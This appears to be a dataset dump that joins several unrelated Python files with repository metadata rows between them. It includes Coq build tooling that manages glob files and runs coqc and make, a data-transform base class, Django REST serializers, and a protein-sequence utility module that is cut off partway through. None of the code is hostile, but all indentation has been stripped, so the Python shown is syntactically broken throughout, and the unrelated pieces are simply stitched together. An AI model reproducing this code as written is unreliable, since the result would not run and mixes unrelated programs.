'''Returns True if absolutizing the types of things mentioned by the tuple is enough to ensure that we only use absolute names'''
return set(ALL_ABSOLUTIZE_TUPLE).issubset(set(absolutize_tuple))
def libname_with_dot(logical_name):
if logical_name in ("", '""', "''"):
return ""
else:
return logical_name + "."
def clear_libimport_cache(libname):
if libname in lib_imports_fast.keys():
del lib_imports_fast[libname]
if libname in lib_imports_slow.keys():
del lib_imports_slow[libname]
@memoize
def os_walk(top, topdown=True, onerror=None, followlinks=False):
return tuple(os.walk(top, topdown=topdown, onerror=onerror, followlinks=followlinks))
@memoize
def os_path_isfile(filename):
return os.path.isfile(filename)
def filenames_of_lib_helper(lib, libnames, non_recursive_libnames, ext):
for physical_name, logical_name in list(libnames) + list(non_recursive_libnames):
if lib.startswith(libname_with_dot(logical_name)):
cur_lib = lib[len(libname_with_dot(logical_name)):]
cur_lib = os.path.join(physical_name, cur_lib.replace('.', os.sep))
yield fix_path(os.path.relpath(os.path.normpath(cur_lib + ext), '.'))
def local_filenames_of_lib_helper(lib, libnames, non_recursive_libnames, ext):
# is this the right thing to do?
lib = lib.replace('.', os.sep)
for dirpath, dirname, filenames in os_walk('.', followlinks=True):
filename = os.path.relpath(os.path.normpath(os.path.join(dirpath, lib + ext)), '.')
if os_path_isfile(filename):
yield fix_path(filename)
@memoize
def filename_of_lib_helper(lib, libnames, non_recursive_libnames, ext):
filenames = list(filenames_of_lib_helper(lib, libnames, non_recursive_libnames, ext))
local_filenames = list(local_filenames_of_lib_helper(lib, libnames, non_recursive_libnames, ext))
existing_filenames = [f for f in filenames if os_path_isfile(f) or os_path_isfile(os.path.splitext(f)[0] + '.v')]
if len(existing_filenames) > 0:
retval = existing_filenames[0]
if len(existing_filenames) == 1:
return retval
else:
DEFAULT_LOG('WARNING: Multiple physical paths match logical path %s: %s. Selecting %s.'
% (lib, ', '.join(existing_filenames), retval))
return retval
if len(filenames) != 0:
DEFAULT_LOG('WARNING: One or more physical paths match logical path %s, but none of them exist: %s'
% (lib, ', '.join(filenames)))
if len(local_filenames) > 0:
retval = local_filenames[0]
if len(local_filenames) == 1:
return retval
else:
DEFAULT_LOG('WARNING: Multiple local physical paths match logical path %s: %s. Selecting %s.'
% (lib, ', '.join(local_filenames), retval))
return retval
if len(filenames) > 0:
retval = filenames[0]
if len(filenames) == 1:
return retval
else:
DEFAULT_LOG('WARNING: Multiple non-existent physical paths match logical path %s: %s. Selecting %s.'
% (lib, ', '.join(filenames), retval))
return retval
return fix_path(os.path.relpath(os.path.normpath(lib.replace('.', os.sep) + ext), '.'))
def filename_of_lib(lib, ext='.v', **kwargs):
kwargs = fill_kwargs(kwargs)
return filename_of_lib_helper(lib, libnames=tuple(kwargs['libnames']), non_recursive_libnames=tuple(kwargs['non_recursive_libnames']), ext=ext)
@memoize
def lib_of_filename_helper(filename, libnames, non_recursive_libnames, exts):
filename = os.path.relpath(os.path.normpath(filename), '.')
for ext in exts:
if filename.endswith(ext):
filename = filename[:-len(ext)]
break
for physical_name, logical_name in ((os.path.relpath(os.path.normpath(phys), '.'), libname_with_dot(logical)) for phys, logical in list(libnames) + list(non_recursive_libnames)):
filename_rel = os.path.relpath(filename, physical_name)
if not filename_rel.startswith('..' + os.sep) and not os.path.isabs(filename_rel):
return (filename, logical_name + filename_rel.replace(os.sep, '.'))
if filename.startswith('..' + os.sep) and not os.path.isabs(filename):
filename = os.path.abspath(filename)
return (filename, filename.replace(os.sep, '.'))
def lib_of_filename(filename, exts=('.v', '.glob'), **kwargs):
kwargs = fill_kwargs(kwargs)
filename, libname = lib_of_filename_helper(filename, libnames=tuple(kwargs['libnames']), non_recursive_libnames=tuple(kwargs['non_recursive_libnames']), exts=exts)
# if '.' in filename and kwargs['verbose']:
# # TODO: Do we still need this warning?
# kwargs['log']("WARNING: There is a dot (.) in filename %s; the library conversion probably won't work." % filename)
return libname
def is_local_import(libname, **kwargs):
'''Returns True if libname is an import to a local file that we can discover and include, and False otherwise'''
return os.path.isfile(filename_of_lib(libname, **kwargs))
def get_raw_file_as_bytes(filename, **kwargs):
kwargs = fill_kwargs(kwargs)
if kwargs['verbose']:
filename_extra = '' if os.path.isabs(filename) else ' (%s)' % os.path.abspath(filename)
kwargs['log']('getting %s%s' % (filename, filename_extra))
with open(filename, 'rb') as f:
return f.read()
def get_raw_file(*args, **kwargs):
return util.normalize_newlines(get_raw_file_as_bytes(*args, **kwargs).decode('utf-8'))
# code is string
@memoize
def get_constr_name(code):
first_word = code.split(' ')[0]
last_component = first_word.split('.')[-1]
return last_component
# before, after are both strings
def move_strings_once(before, after, possibility, relaxed=False):
for i in possibility:
if before[-len(i):] == i:
return before[:-len(i)], before[-len(i):] + after
if relaxed: # allow no matches
return before, after
else:
return None, None
# before, after are both strings
def move_strings_pre(before, after, possibility):
while len(before) > 0:
new_before, new_after = move_strings_once(before, after, possibility)
if new_before is None or new_after is None:
return before, after
before, after = new_before, new_after
return (before, after)
# before, after are both strings
def move_function(before, after, get_len):
while len(before) > 0:
n = get_len(before)
if n is None or n <= 0:
return before, after
before, after = before[:-n], before[n:] + after
return before, after
# before, after are both strings
def move_strings(before, after, *possibilities):
for possibility in possibilities:
before, after = move_strings_pre(before, after, possibility)
return before, after
# before, after are both strings
def move_space(before, after):
return move_strings(before, after, '\n\t\r ')
# uses byte locations
def remove_from_require_before(contents, location):
"""removes "From ... " from things like "From ... Require ..." """
assert(contents is bytes(contents))
before, after = contents[:location].decode('utf-8'), contents[location:].decode('utf-8')
before, after = move_space(before, after)
before, after = move_strings_once(before, after, ('Import', 'Export'), relaxed=True)
before, after = move_space(before, after)
before, after = move_strings_once(before, after, ('Require',), relaxed=False)
if before is None or after is None: return contents
before, _ = move_space(before, after)
before, _ = move_function(before, after, (lambda b: 1 if b[-1] not in ' \t\r\n' else None))
if before is None: return contents
before, _ = move_space(before, after)
before, _ = move_strings_once(before, after, ('From',), relaxed=False)
if before is None: return contents
return (before + after).encode('utf-8')
# returns locations as bytes
def get_references_from_globs(globs):
all_globs = set((int(start), int(end) + 1, loc, append, ty.strip())
for start, end, loc, append, ty
in re.findall('^R([0-9]+):([0-9]+) ([^ ]+) <> ([^ ]+) ([^ ]+)$', globs, flags=re.MULTILINE))
return tuple(sorted(all_globs, key=(lambda x: x[0]), reverse=True))
# contents should be bytes; globs should be string
def update_with_glob(contents, globs, absolutize, libname, transform_base=(lambda x: x), **kwargs):
assert(contents is bytes(contents))
kwargs = fill_kwargs(kwargs)
for start, end, loc, append, ty in get_references_from_globs(globs):
cur_code = contents[start:end].decode('utf-8')
if ty not in absolutize or loc == libname:
if kwargs['verbose'] >= 2: kwargs['log']('Skipping %s at %d:%d (%s), location %s %s' % (ty, start, end, cur_code, loc, append))
# sanity check for correct replacement, to skip things like record builder notation
elif append != '<>' and get_constr_name(cur_code) != append:
if kwargs['verbose'] >= 2: kwargs['log']('Skipping invalid %s at %d:%d (%s), location %s %s' % (ty, start, end, cur_code, loc, append))
else: # ty in absolutize and loc != libname
rep = transform_base(loc) + ('.' + append if append != '<>' else '')
if kwargs['verbose'] == 2: kwargs['log']('Qualifying %s %s to %s' % (ty, cur_code, rep))
if kwargs['verbose'] > 2: kwargs['log']('Qualifying %s %s to %s from R%s:%s %s <> %s %s' % (ty, cur_code, rep, start, end, loc, append, ty))
contents = contents[:start] + rep.encode('utf-8') + contents[end:]
contents = remove_from_require_before(contents, start)
return contents
def get_all_v_files(directory, exclude=tuple()):
all_files = []
exclude = [os.path.normpath(i) for i in exclude]
for dirpath, dirnames, filenames in os.walk(directory):
all_files += [os.path.relpath(name, '.') for name in glob.glob(os.path.join(dirpath, '*.v'))
if os.path.normpath(name) not in exclude]
return tuple(map(fix_path, all_files))
# we want to run on passing arguments if we're running in
# passing/non-passing mode, cf
# https://github.com/JasonGross/coq-tools/issues/57. Hence we return
# the passing version iff passing_coqc is passed
def get_maybe_passing_arg(kwargs, key):
if kwargs.get('passing_coqc'): return kwargs['passing_' + key]
return kwargs[key]
def run_coq_makefile_and_make(v_files, targets, **kwargs):
kwargs = safe_kwargs(fill_kwargs(kwargs))
f = tempfile.NamedTemporaryFile(suffix='.coq', prefix='Makefile', dir='.', delete=False)
mkfile = os.path.basename(f.name)
f.close()
cmds = [kwargs['coq_makefile'], 'COQC', '=', get_maybe_passing_arg(kwargs, 'coqc'), '-o', mkfile]
for physical_name, logical_name in get_maybe_passing_arg(kwargs, 'libnames'):
cmds += ['-R', physical_name, (logical_name if logical_name not in ("", "''", '""') else '""')]
for physical_name, logical_name in get_maybe_passing_arg(kwargs, 'non_recursive_libnames'):
cmds += ['-Q', physical_name, (logical_name if logical_name not in ("", "''", '""') else '""')]
for dirname in get_maybe_passing_arg(kwargs, 'ocaml_dirnames'):
cmds += ['-I', dirname]
coq_makefile_help = get_coqc_help(kwargs['coq_makefile'], **kwargs)
grouped_args, unrecognized_args = group_coq_args_split_recognized(get_maybe_passing_arg(kwargs, 'coqc_args'), coq_makefile_help, is_coq_makefile=True)
for args in grouped_args:
cmds.extend(args)
if unrecognized_args:
if coq_makefile_supports_arg(coq_makefile_help):
for arg in unrecognized_args:
cmds += ['-arg', arg]
else:
if kwargs['verbose']: kwargs['log']('WARNING: Unrecognized arguments to coq_makefile: %s' % repr(unrecognized_args))
cmds += list(map(fix_path, v_files))
if kwargs['verbose']:
kwargs['log'](' '.join(cmds))
try:
p_make_makefile = subprocess.Popen(cmds,
stdout=subprocess.PIPE)
(stdout, stderr) = p_make_makefile.communicate()
except OSError as e:
error("When attempting to run coq_makefile:")
error(repr(e))
error("Failed to run coq_makefile using command line:")
error(' '.join(cmds))
error("Perhaps you forgot to add COQBIN to your PATH?")
error("Try running coqc on your files to get .glob files, to work around this.")
sys.exit(1)
if kwargs['verbose']:
kwargs['log'](' '.join(['make', '-k', '-f', mkfile] + targets))
try:
p_make = subprocess.Popen(['make', '-k', '-f', mkfile] + targets, stdin=subprocess.PIPE, stdout=sys.stderr) #, stdout=subprocess.PIPE)
return p_make.communicate()
finally:
for filename in (mkfile, mkfile + '.conf', mkfile + '.d', '.%s.d' % mkfile, '.coqdeps.d'):
if os.path.exists(filename):
os.remove(filename)
def make_one_glob_file(v_file, **kwargs):
kwargs = safe_kwargs(fill_kwargs(kwargs))
coqc_prog = get_maybe_passing_arg(kwargs, 'coqc')
cmds = [coqc_prog, '-q']
for physical_name, logical_name in get_maybe_passing_arg(kwargs, 'libnames'):
cmds += ['-R', physical_name, (logical_name if logical_name not in ("", "''", '""') else '""')]
for physical_name, logical_name in get_maybe_passing_arg(kwargs, 'non_recursive_libnames'):
cmds += ['-Q', physical_name, (logical_name if logical_name not in ("", "''", '""') else '""')]
for dirname in get_maybe_passing_arg(kwargs, 'ocaml_dirnames'):
cmds += ['-I', dirname]
cmds += list(get_maybe_passing_arg(kwargs, 'coqc_args'))
v_file_root, ext = os.path.splitext(fix_path(v_file))
o_file = os.path.join(tempfile.gettempdir(), os.path.basename(v_file_root) + '.vo')
if get_coq_accepts_o(coqc_prog, **kwargs):
cmds += ['-o', o_file]
else:
kwargs['log']("WARNING: Clobbering '%s' because coqc does not support -o" % o_file)
cmds += ['-dump-glob', v_file_root + '.glob', v_file_root + ext]
if kwargs['verbose']:
kwargs['log'](' '.join(cmds))
try:
p = subprocess.Popen(cmds, stdout=subprocess.PIPE)
return p.communicate()
finally:
if os.path.exists(o_file): os.remove(o_file)
def make_globs(logical_names, **kwargs):
kwargs = fill_kwargs(kwargs)
existing_logical_names = [i for i in logical_names
if os.path.isfile(filename_of_lib(i, ext='.v', **kwargs))]
if len(existing_logical_names) == 0: return
filenames_vo_v_glob = [(filename_of_lib(i, ext='.vo', **kwargs), filename_of_lib(i, ext='.v', **kwargs), filename_of_lib(i, ext='.glob', **kwargs)) for i in existing_logical_names]
filenames_vo_v_glob = [(vo_name, v_name, glob_name) for vo_name, v_name, glob_name in filenames_vo_v_glob
if not (os.path.isfile(glob_name) and os.path.getmtime(glob_name) > os.path.getmtime(v_name))]
for vo_name, v_name, glob_name in filenames_vo_v_glob:
if os.path.isfile(glob_name) and not os.path.getmtime(glob_name) > os.path.getmtime(v_name):
os.remove(glob_name)
# if the .vo file already exists and is new enough, we assume
# that all dependent .vo files also exist, and just run coqc
# in a way that doesn't update the .vo file. We use >= rather
# than > because we're using .vo being new enough as a proxy
# for the dependent .vo files existing, so we don't care as
# much about being perfectly accurate on .vo file timing
# (unlike .glob file timing, were we need it to be up to
# date), and it's better to not clobber the .vo file when
# we're unsure if it's new enough.
if os.path.exists(vo_name) and os.path.getmtime(vo_name) >= os.path.getmtime(v_name):
make_one_glob_file(v_name, **kwargs)
filenames_vo_v_glob = [(vo_name, v_name, glob_name) for vo_name, v_name, glob_name in filenames_vo_v_glob
if not (os.path.exists(vo_name) and os.path.getmtime(vo_name) >= os.path.getmtime(v_name))]
filenames_v = [v_name for vo_name, v_name, glob_name in filenames_vo_v_glob]
filenames_glob = [glob_name for vo_name, v_name, glob_name in filenames_vo_v_glob]
if len(filenames_vo_v_glob) == 0: return
extra_filenames_v = (get_all_v_files('.', filenames_v) if kwargs['walk_tree'] else [])
(stdout_make, stderr_make) = run_coq_makefile_and_make(tuple(sorted(list(filenames_v) + list(extra_filenames_v))), filenames_glob, **kwargs)
def get_glob_file_for(filename, update_globs=False, **kwargs):
kwargs = fill_kwargs(kwargs)
filename = fix_path(filename)
if filename[-2:] != '.v': filename += '.v'
libname = lib_of_filename(filename, **kwargs)
globname = filename[:-2] + '.glob'
if filename not in file_contents.keys() or file_mtimes[filename] < os.stat(filename).st_mtime:
file_contents[filename] = get_raw_file_as_bytes(filename, **kwargs)
file_mtimes[filename] = os.stat(filename).st_mtime
if update_globs:
if file_mtimes[filename] > time.time():
kwargs['log']("WARNING: The file %s comes from the future! (%d > %d)" % (filename, file_mtimes[filename], time.time()))
if time.time() - file_mtimes[filename] < 2:
if kwargs['verbose']:
kwargs['log']("NOTE: The file %s is very new (%d, %d seconds old), delaying until it's a bit older" % (filename, file_mtimes[filename], time.time() - file_mtimes[filename]))
# delay until the .v file is old enough that a .glob file will be considered newer
# if we just wait until they're not equal, we apparently get issues like https://gitlab.com/Zimmi48/coq/-/jobs/535005442
while time.time() - file_mtimes[filename] < 2:
time.sleep(0.1)
make_globs([libname], **kwargs)
if os.path.isfile(globname):
if os.stat(globname).st_mtime > file_mtimes[filename]:
return get_raw_file(globname, **kwargs)
elif kwargs['verbose']:
kwargs['log']("WARNING: Assuming that %s is not a valid reflection of %s because %s is newer (%d >= %d)" % (globname, filename, filename, file_mtimes[filename], os.stat(globname).st_mtime))
return None
def get_byte_references_for(filename, types, **kwargs):
globs = get_glob_file_for(filename, **kwargs)
if globs is None: return None
references = get_references_from_globs(globs)
return tuple((start, end, loc, append, ty) for start, end, loc, append, ty in references
if types is None or ty in types)
def get_file_as_bytes(filename, absolutize=('lib',), update_globs=False, **kwargs):
kwargs = fill_kwargs(kwargs)
filename = fix_path(filename)
if filename[-2:] != '.v': filename += '.v'
libname = lib_of_filename(filename, **kwargs)
globname = filename[:-2] + '.glob'
if filename not in file_contents.keys() or file_mtimes[filename] < os.stat(filename).st_mtime:
file_contents[filename] = get_raw_file_as_bytes(filename, **kwargs)
file_mtimes[filename] = os.stat(filename).st_mtime
if len(absolutize) > 0:
globs = get_glob_file_for(filename, update_globs=update_globs, **kwargs)
if globs is not None:
file_contents[filename] = update_with_glob(file_contents[filename], globs, absolutize, libname, **kwargs)
return file_contents[filename]
# returns string, newlines normalized
def get_file(*args, **kwargs):
return util.normalize_newlines(get_file_as_bytes(*args, **kwargs).decode('utf-8'))
def get_require_dict(lib, **kwargs):
kwargs = fill_kwargs(kwargs)
lib = norm_libname(lib, **kwargs)
glob_name = filename_of_lib(lib, ext='.glob', **kwargs)
v_name = filename_of_lib(lib, ext='.v', **kwargs)
if lib not in lib_imports_slow.keys():
make_globs([lib], **kwargs)
if os.path.isfile(glob_name): # making succeeded
contents = get_raw_file(glob_name, **kwargs)
lines = contents.split('\n')
lib_imports_slow[lib] = {}
for start, end, name in IMPORT_REG.findall(contents):
name = norm_libname(name, **kwargs)
if name not in lib_imports_slow[lib].keys():
lib_imports_slow[lib][name] = []
lib_imports_slow[lib][name].append((int(start), int(end)))
for name in lib_imports_slow[lib].keys():
lib_imports_slow[lib][name] = tuple(lib_imports_slow[lib][name])
if lib in lib_imports_slow.keys():
return lib_imports_slow[lib]
return {}
def get_require_names(lib, **kwargs):
return tuple(sorted(get_require_dict(lib, **kwargs).keys()))
def get_require_locations(lib, **kwargs):
return sorted(set(loc for name, locs in get_require_dict(lib, **kwargs).items()
for loc in locs))
def transitively_close(d, make_new_value=(lambda x: tuple()), reflexive=True):
updated = True
while updated:
updated = False
for key in tuple(d.keys()):
newv = set(d[key])
if reflexive: newv.add(key)
for v in tuple(newv):
if v not in d.keys(): d[v] = make_new_value(v)
newv.update(set(d[v]))
if newv != set(d[key]):
d[key] = newv
updated = True
return d
def get_recursive_requires(*libnames, **kwargs):
requires = dict((lib, get_require_names(lib, **kwargs)) for lib in libnames)
transitively_close(requires, make_new_value=(lambda lib: get_require_names(lib, **kwargs)), reflexive=True)
return requires
def get_recursive_require_names(libname, **kwargs):
return tuple(i for i in get_recursive_requires(libname, **kwargs).keys() if i != libname)
def sort_files_by_dependency(filenames, reverse=True, **kwargs):
kwargs = fill_kwargs(kwargs)
filenames = map(fix_path, filenames)
filenames = [(filename + '.v' if filename[-2:] != '.v' else filename) for filename in filenames]
libnames = [lib_of_filename(filename, **kwargs) for filename in filenames]
requires = get_recursive_requires(*libnames, **kwargs)
def fcmp(f1, f2):
if f1 == f2: return cmp(f1, f2)
l1, l2 = lib_of_filename(f1, **kwargs), lib_of_filename(f2, **kwargs)
if l1 == l2: return cmp(f1, f2)
# this only works correctly if the closure is *reflexive* as
# well as transitive, because we require that if A requires B,
# then A must have strictly more requires than B (i.e., it
# must include itself)
if len(requires[l1]) != len(requires[l2]): return cmp(len(requires[l1]), len(requires[l2]))
return cmp(l1, l2)
filenames = sorted(filenames, key=cmp_to_key(fcmp), reverse=reverse)
return filenames
def get_imports(lib, fast=False, **kwargs):
kwargs = fill_kwargs(kwargs)
lib = norm_libname(lib, **kwargs)
glob_name = filename_of_lib(lib, ext='.glob', **kwargs)
v_name = filename_of_lib(lib, ext='.v', **kwargs)
if not fast:
get_require_dict(lib, **kwargs)
if lib in lib_imports_slow.keys():
return tuple(k for k, v in sorted(lib_imports_slow[lib].items(), key=(lambda kv: kv[1])))
# making globs failed, or we want the fast way, fall back to regexp
if lib not in lib_imports_fast.keys():
contents = get_file(v_name, **kwargs)
imports_string = re.sub('\\s+', ' ', ' '.join(IMPORT_LINE_REG.findall(contents))).strip()
lib_imports_fast[lib] = tuple(sorted(set(norm_libname(i, **kwargs)
for i in imports_string.split(' ') if i != '')))
return lib_imports_fast[lib]
def norm_libname(lib, **kwargs):
kwargs = fill_kwargs(kwargs)
filename = filename_of_lib(lib, **kwargs)
if os.path.isfile(filename):
return lib_of_filename(filename, **kwargs)
else:
return lib
def merge_imports(imports, **kwargs):
kwargs = fill_kwargs(kwargs)
rtn = []
for import_list in imports:
for i in import_list:
if norm_libname(i, **kwargs) not in rtn:
rtn.append(norm_libname(i, **kwargs))
return rtn
# This is a bottleneck for more than around 10,000 lines of code total with many imports (around 100)
@memoize
def internal_recursively_get_imports(lib, **kwargs):
return run_recursively_get_imports(lib, recur=internal_recursively_get_imports, **kwargs)
def recursively_get_imports(lib, **kwargs):
return internal_recursively_get_imports(lib, **safe_kwargs(kwargs))
def run_recursively_get_imports(lib, recur=recursively_get_imports, fast=False, **kwargs):
kwargs = fill_kwargs(kwargs)
lib = norm_libname(lib, **kwargs)
glob_name = filename_of_lib(lib, ext='.glob', **kwargs)
v_name = filename_of_lib(lib, ext='.v', **kwargs)
if os.path.isfile(v_name):
imports = get_imports(lib, fast=fast, **kwargs)
if kwargs['inline_coqlib'] and 'Coq.Init.Prelude' not in imports:
mykwargs = dict(kwargs)
coqlib_libname = (os.path.join(kwargs['inline_coqlib'], 'theories'), 'Coq')
if coqlib_libname not in mykwargs['libnames']:
mykwargs['libnames'] = tuple(list(kwargs['libnames']) + [coqlib_libname])
try:
coqlib_imports = get_imports('Coq.Init.Prelude', fast=fast, **mykwargs)
if imports and not any(i in imports for i in coqlib_imports):
imports = tuple(list(coqlib_imports) + list(imports))
except IOError as e:
kwargs['log']("WARNING: --inline-coqlib passed, but no Coq.Init.Prelude found on disk.\n Searched in %s\n (Error was: %s)\n\n" % (repr(mykwargs['libnames']), repr(e)))
if not fast: make_globs(imports, **kwargs)
imports_list = [recur(k, fast=fast, **kwargs) for k in imports]
return merge_imports(tuple(map(tuple, imports_list + [[lib]])), **kwargs)
return [lib]
| mit | 1,641,937,864,110,081,000 | 49.052632 | 404 | 0.625096 | false |
mverleg/data_cleaner | controller/base_transform.py | 1 | 3490 |
from copy import deepcopy
from collections import OrderedDict
from misc import load_cls
class BaseTransform():
name = None # default value is the class name
description = 'transforms data'
options = [] # dictionaries with name, type, default and required
class NotInitialized(Exception):
""" Tried to apply a transformation that hasn't learned parameters yet. """
def __init__(self):
"""
Set initial configuration and parameters.
"""
self.conf = {}
for option in self.options:
self.conf[option['name']] = option['default']
self.set_params({})
def get_name(self):
"""
If name is None, get is from the class.
"""
return self.name or self.__class__.__name__.lower()
def __repr__(self):
"""
String representation of instances.
"""
confstr = ','.join('{0:}={1:}'.format(k, v) for k, v in self.conf.items()) or 'noconf'
return '{0:s}:{1:s}'.format(self.get_name().replace(' ', '_'), confstr)
def learn(self, row):
"""
Learn any parameters from the data.
:param row: The data row to learn from.
"""
def do(self, row):
"""
Apply the transformation on the given row(s).
:param data: Iterable of equal-length numpy 1D data arrays.
:return: Collection of transformed equal-length numpy 1D data arrays.
"""
return row
def get_conf(self):
"""
:return: JSON-able dictionary containing configuration options.
"""
return deepcopy(self.conf)
def set_conf(self, input):
"""
Update configuration.
:param loaded: A JSON-able dictionary containing configuration options.
Works for empty dictionary (set defaults). Rejects invalid configurations.
"""
option_names = [option['name'] for option in self.options]
for name, value in input.items():
assert name in option_names, 'Unknown option "{0:s}" for "{1:s}"; accepted options are "{2:s}"'.format(name, type(self), '", "'.join(option_names))
#todo: check/cast default types
def get_params(self):
"""
:return: JSON-able dictionary containing learned parameters.
"""
return deepcopy(self.params)
def set_params(self, input):
"""
Set parameters to previously learned ones, resetting any existing ones.
:param loaded: A JSON-able dictionary containing parameters.
There is less error checking here than for configuration, since this data is supposed to come directly from this class.
"""
self.params = deepcopy(input)
def to_json(self):
"""
An encoder, converting this instance to JSON-able primary types.
:return: A dictionary representing this instance.
"""
pypath = '{0:s}.{1:s}'.format(self.__class__.__module__, self.__class__.__name__)
return OrderedDict([
('transformation', pypath),
('conf', self.get_conf()),
('params', self.get_params()),
])
@classmethod
def from_json(cls, di):
"""
A constructor/decoder to create instances from primary types (JSON-serializable ones), as created by to_json().
:param str: A dictionary representing the transform instance.
:return: An instance of the appropriate transform with the loaded attributes.
"""
for key in di.keys():
assert key in ('transformation', 'conf', 'params',), 'unknown transform property {0:s}'.format(key)
assert 'transformation' in di, 'type of transformation not found (should have \'transformation\': pythonpath)'
Trns = load_cls(di['transformation'])
trns = Trns()
if 'conf' in di:
trns.set_conf(di['conf'])
if 'params' in di:
trns.set_params(di['params'])
return trns
| mit | 7,570,391,018,442,940,000 | 27.842975 | 150 | 0.675645 | false |
RUBi-ZA/JMS | src/users/serializers.py | 2 | 2766 | from rest_framework import serializers
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Group
from users.models import *
class CountrySerializer(serializers.ModelSerializer):
class Meta:
model = Country
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = get_user_model()
fields = ('date_joined','email','first_name','id','last_login','last_name','username')
class GroupUserSerializer(serializers.ModelSerializer):
class Meta:
model = get_user_model()
fields = ('id','username')
class GroupSerializer(serializers.ModelSerializer):
user_set = GroupUserSerializer(many=True)
class Meta:
model = Group
fields = ('id', 'name', 'user_set')
class UserProfileSerializer(serializers.ModelSerializer):
user = UserSerializer()
Country = CountrySerializer()
class Meta:
model = UserProfile
class UserProfileNameSerializer(serializers.ModelSerializer):
user = UserSerializer()
class Meta:
model = UserProfile
fields = ('user',)
class ContactUserSerializer(serializers.ModelSerializer):
class Meta:
model = get_user_model()
fields = ('date_joined','first_name','id','last_name','username')
class ContactProfileSerializer(serializers.ModelSerializer):
user = ContactUserSerializer()
Country = CountrySerializer()
class Meta:
model = UserProfile
class ContactSerializer(serializers.ModelSerializer):
ContactProfile = ContactProfileSerializer()
class Meta:
model = Contact
class MessageSerializer(serializers.ModelSerializer):
UserProfile = UserProfileNameSerializer()
class Meta:
model = Message
fields = ('MessageID', 'Content', 'Date', 'UserProfile')
class UserConversationSerializer(serializers.ModelSerializer):
UserProfile = UserProfileSerializer()
class Meta:
model = UserConversation
class FullConversationSerializer(serializers.ModelSerializer):
UserConversations = UserConversationSerializer(many=True)
Messages = MessageSerializer(many=True)
class Meta:
model = Conversation
fields = ('ConversationID', 'Subject', 'LastMessage', 'UserConversations', 'Messages')
class ConversationSerializer(serializers.ModelSerializer):
UserConversations = UserConversationSerializer(many=True)
class Meta:
model = Conversation
fields = ('ConversationID', 'Subject', 'LastMessage', 'UserConversations')
class GroupConversationSerializer(serializers.ModelSerializer):
Conversation = FullConversationSerializer()
class Meta:
model = GroupConversation
fields = ('Conversation',)
class GroupDetailSerializer(serializers.ModelSerializer):
user_set = GroupUserSerializer(many=True)
groupconversation = GroupConversationSerializer()
class Meta:
model = Group
fields = ('id', 'name', 'user_set', 'groupconversation')
| gpl-2.0 | -2,556,878,542,363,221,000 | 26.386139 | 88 | 0.770065 | false |
yotamfr/prot2vec | src/python/dingo_utils.py | 1 | 19157 | import torch
import os
import sys
import itertools
import threading
from concurrent.futures import ThreadPoolExecutor
from src.python.preprocess2 import *
from blast import *
from tempfile import gettempdir
tmp_dir = gettempdir()
out_dir = "./Data"
from scipy.stats import *
import pickle
NUM_CPU = 8
eps = 10e-6
E = ThreadPoolExecutor(NUM_CPU)
np.random.seed(101)
tmp_dir = gettempdir()
EVAL = 10e6
verbose = False
def save_object(obj, filename):
with open(filename, 'wb') as output:
try:
pickle.dump(obj, output, pickle.HIGHEST_PROTOCOL)
except RecursionError:
sys.setrecursionlimit(2 * sys.getrecursionlimit())
save_object(obj, filename)
def load_object(pth):
with open(pth, 'rb') as f:
loaded_dist_mat = pickle.load(f)
assert len(loaded_dist_mat) > 0
return loaded_dist_mat
def to_fasta(seq_map, out_file):
sequences = []
for unipid, seq in seq_map.items():
sequences.append(SeqRecord(BioSeq(seq), unipid))
SeqIO.write(sequences, open(out_file, 'w+'), "fasta")
def load_nature_repr_set(db):
def to_fasta(seq_map, out_file):
sequences = []
for unipid, seq in seq_map.items():
sequences.append(SeqRecord(BioSeq(seq), unipid))
SeqIO.write(sequences, open(out_file, 'w+'), "fasta")
repr_pth, all_pth = '%s/sp.nr.70' % out_dir, '%s/sp.fasta' % out_dir
fasta_fname = '%s/sp.nr.70' % out_dir
if not os.path.exists(repr_pth):
query = {"db": "sp"}
num_seq = db.uniprot.count(query)
src_seq = db.uniprot.find(query)
sp_seqs = UniprotCollectionLoader(src_seq, num_seq).load()
to_fasta(sp_seqs, all_pth)
os.system("cdhit/cd-hit -i %s -o %s -c 0.7 -n 5" % (all_pth, repr_pth))
num_seq = count_lines(fasta_fname, sep=bytes('>', 'utf8'))
fasta_src = parse_fasta(open(fasta_fname, 'r'), 'fasta')
seq_map = FastaFileLoader(fasta_src, num_seq).load()
all_seqs = [Seq(uid, str(seq)) for uid, seq in seq_map.items()]
return all_seqs
def get_distribution(dataset):
assert len(dataset) >= 3
return Distribution(dataset)
class Distribution(object):
def __init__(self, dataset):
self.pdf = gaussian_kde([d * 10 for d in dataset])
def __call__(self, *args, **kwargs):
assert len(args) == 1
# return self.pdf.integrate_box_1d(np.min(self.pdf.dataset), args[0])
return self.pdf(args[0])[0]
class Histogram(object):
def __init__(self, dataset):
self.bins = {(a, a + 1): .01 for a in range(10)}
for p in dataset:
a = min(int(p * 10), 9)
self.bins[(a, a + 1)] += 0.9 / len(dataset)
def __call__(self, *args, **kwargs):
v = int(args[0] * 10)
return self.bins[(v, v + 1)]
class NaiveBayes(object):
def __init__(self, dist_pos, dist_neg):
self.dist_pos = dist_pos
self.dist_neg = dist_neg
def infer(self, val, prior):
dist_pos = self.dist_pos
dist_neg = self.dist_neg
return np.log(prior) + np.log(dist_pos(val)) - np.log(dist_neg(val))
class ThreadSafeDict(dict) :
def __init__(self, * p_arg, ** n_arg) :
dict.__init__(self, * p_arg, ** n_arg)
self._lock = threading.Lock()
def __enter__(self) :
self._lock.acquire()
return self
def __exit__(self, type, value, traceback) :
self._lock.release()
class Seq(object):
def __init__(self, uid, seq, aa20=True):
if aa20:
self.seq = seq.replace('U', 'C').replace('O', 'K')\
.replace('X', np.random.choice(amino_acids))\
.replace('B', np.random.choice(['N', 'D']))\
.replace('Z', np.random.choice(['E', 'Q']))
else:
self.seq = seq
self.uid = uid
self.msa = None
self.f = dict()
def __hash__(self):
return hash(self.uid)
def __repr__(self):
return "Seq(%s, %s)" % (self.uid, self.seq)
def __eq__(self, other):
if isinstance(other, Seq):
return self.uid == other.uid
else:
return False
def __ne__(self, other):
return not self.__eq__(other)
def __len__(self):
return len(self.seq)
class Node(object):
def __init__(self, go, sequences, fathers, children):
self.go = go
self.sequences = sequences
self.fathers = fathers
self.children = children
self._f_dist_out = None
self._f_dist_in = None
self._plus = None
self._ancestors = None
self._descendants = None
self.seq2vec = {}
self.dataset = [] # for K-S tests
def __iter__(self):
for seq in self.sequences:
yield seq
def __repr__(self):
